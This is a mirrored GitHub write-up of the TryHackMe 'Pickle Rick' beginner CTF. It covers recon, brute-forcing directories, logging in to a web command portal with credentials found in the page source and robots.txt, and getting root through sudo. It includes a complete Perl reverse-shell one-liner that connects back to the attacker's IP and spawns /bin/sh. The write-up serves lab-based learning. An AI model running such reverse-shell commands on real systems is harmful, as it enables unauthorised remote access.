Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-22 20:13:02 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/TryHackMe/PickleRickCTF.md
AbdullahRizwan101 46691abe02
Add files via upload
2020-08-22 00:03:24 +05:00

111 lines
No EOL
4.4 KiB
Markdown
Raw Blame History

# TryHackMe-PickleRick CTF
Abdullah Rizwan ,21 August , 09:35 PM
PickleRick is a free beginner level webapplication kinda CTF.
## NMAP
Like always we are going to fire up our nmap scan on the box to look for open ports
```
nmap -T4 -A -p- 10.10.208.39
```
Here
-T4 tells the speed of scanning
-A tells to look for all
-p- tells to look for ports
and in the end is the box ip (machine ip)
<a href="https://imgur.com/SDGCB0V"><img src="https://i.imgur.com/SDGCB0V.png" title="source: imgur.com" /></a>
Here we can see that there are 2 open ports
SSH (22)
HTTP (80)
So first we will try to exploit HTTP
<a href="https://imgur.com/QUpMxwe"><img src="https://i.imgur.com/QUpMxwe.png" title="source: imgur.com" /></a>
This is the home page that is loaded upon entering the ip address.
<a href="https://imgur.com/GmtVzO3"><img src="https://i.imgur.com/GmtVzO3.png" title="source: imgur.com" /></a>
If we try to look at the source we can see Wubbalubbadubdubthat it's telling us that there's a user named *"R1ckRul3s*" so we are going to use it later when we try to ssh are way into the box.
## Port 80
<a href="https://imgur.com/GmtVzO3"><img src="https://i.imgur.com/GmtVzO3.png" title="source: imgur.com" /></a>
I tried to see if "robots.txt" was accessable and what I found was a text "Wubbalubbadubdub" , i don't know what it means by lets see what elese we can find.
<a href="https://imgur.com/2oUzEDd"><img src="https://i.imgur.com/2oUzEDd.png" title="source: imgur.com" /></a>
### Dirbuster
On bruteforcing directory we find out that there is a login page on the website
<a href="https://imgur.com/POimBHs"><img src="https://i.imgur.com/POimBHs.png" title="source: imgur.com" /></a>
<a href="https://imgur.com/Xpwynbf"><img src="https://i.imgur.com/Xpwynbf.png" title="source: imgur.com" /></a>
On submitting the username and the text we found on robots.txt we are able to login to the potral
<a href="https://imgur.com/56hyQT8"><img src="https://i.imgur.com/56hyQT8.png" title="source: imgur.com" /></a>
From here we can execute commands like "pwd" or "whoami" which will give result of these commands so we can use this as a shell.
<a href="https://imgur.com/pl7RhmL"><img src="https://i.imgur.com/pl7RhmL.png" title="source: imgur.com" /></a>
On the current directory on giving "ls" command we can see what is that current directory also on looking at the source of the page we can find a base64 text but it doesn't really decode into something.
<a href="https://imgur.com/XqGmf1o"><img src="https://i.imgur.com/XqGmf1o.png" title="source: imgur.com" /></a>
But we still can't access the files on the webpage.
I headed over to pentest monkey
<a href="https://imgur.com/2akwyJK"><img src="https://i.imgur.com/2akwyJK.png" title="source: imgur.com" /></a>
Tried the nc(netcat),php,bash,python2 reverse shell but they didn't work so then i tired the perl reverse shell however we can use python3 instead of python2 to execute python reverse shell.
```
perl -e 'use Socket;$i="10.8.94.60";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
<a href="https://imgur.com/mlpDKJg"><img src="https://i.imgur.com/mlpDKJg.png" title="source: imgur.com" /></a>
It gave me a reverse shell on my terminal.
### First Ingredient
So now for the first ingredient I had no problem in viewing "Sup3rS3cretPickl3Ingred.txt".
### Second Ingredient
For second ingredient I moved around the directories and found something named "second ingredients".
<a href="https://imgur.com/DjlG05n"><img src="https://i.imgur.com/DjlG05n.png" title="source: imgur.com" /></a>
For viewing this file as there is a space in between so in linux you have to use '\ ' backslash + space for entering second string of a file.
### Third Ingredient
For the third ingredient there are two ways:
1) Since we can ran any command by writing "sudo" before it so one way is to look into "ubuntu" folder and there we have a file called ".bash_history"
<a href="https://imgur.com/QMFyVvs"><img src="https://i.imgur.com/QMFyVvs.jpg" title="source: imgur.com" /></a>
2) Another method for getting the third ingredient is by accessing "root" folder.
<a href="https://imgur.com/b7SOPCc"><img src="https://i.imgur.com/b7SOPCc.jpg" title="source: imgur.com" /></a>
3) Or you can run "sudo bash" , that would make you a root user.
You have successfully completed this CTF.
Reference in a new issue View git blame Copy permalink